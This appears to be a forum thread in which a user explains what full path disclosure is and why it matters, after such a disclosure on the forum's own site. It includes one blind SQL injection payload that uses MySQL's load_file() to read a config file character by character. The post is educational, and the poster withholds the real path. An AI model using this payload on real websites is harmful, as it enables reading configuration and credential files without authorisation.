Yeah, same here

I agree with others (javey, Element...) and you Eric say explicitly that we won't get access in any case... so? Where is the problem?

Just in case some of you don't understand the term "full path disclosure".

Allow me to explain what it is. data is stored in files, these "files" are organized into directories (collections of files, or other directories)
when a file is in a directory in a directory in a directory, the names of the directories, are constructed into a "path"
ex c:\windows\system32\etc\hosts

but you can also have relative paths, for example etc\hosts if the current directory is c:\windows\system32.

We all know relative path's on the webserver, for example forum/forum_newpost.php
(yeah these could be virtual, due to mod_rewrite, but let us assume they are not)

Now the website disclosed the full path, because of some error messages, which pinpointed what file was causing the error.


SO? This is like so boring, I don't understand why anybody would care to know this.

You would be largely correct this information, is not dynamite. (else I wouldn't have put it in a public forum)

However, it is NOT worthless. There are several attack vectors, which depend on the fact that you know absolute paths.
one of the most obvious ones is the load_file() function of mysql.
eventhough we assume that erik/tbs/... configured mysql correctly. There is this possibility they didn't. And then
a simple blind SQL injection. (sql injections easily sneak into a website like this, and they have at least ones before, when upgrades were done to the forum)
you could instead of selecting data from tables, whose names you have to guess. you could do
' and 97 = (select ascii(substring(load_file('/path/to/website/..../config.php')),x,1))
and this would allow you to read useful files from the disk through a simple blind sql injection.
This situation is not uncommon.

There are other vectors, which also benifit from the knowledge of these paths.



So in conclusion, it's a pretty "lame" thing this full path disclosure. and you know all about it that is worth knowing.
The only thing I have not told you is the "actual" full path. I have done this for several reasons
- It was already filtered by an admin
- I gain nothing by telling it again
- I actually don't have it stored on this computer.


That's about All I have to say about this, I didn't want to irritate anybody, this is somewhat a non-event.
however i'm sure this info is also in tbs's tutorial on web vulnerabilities. If it is don't forget to ack me when you add it.

Thanks rhican for the nice explanation... Some things has been cleard to my mind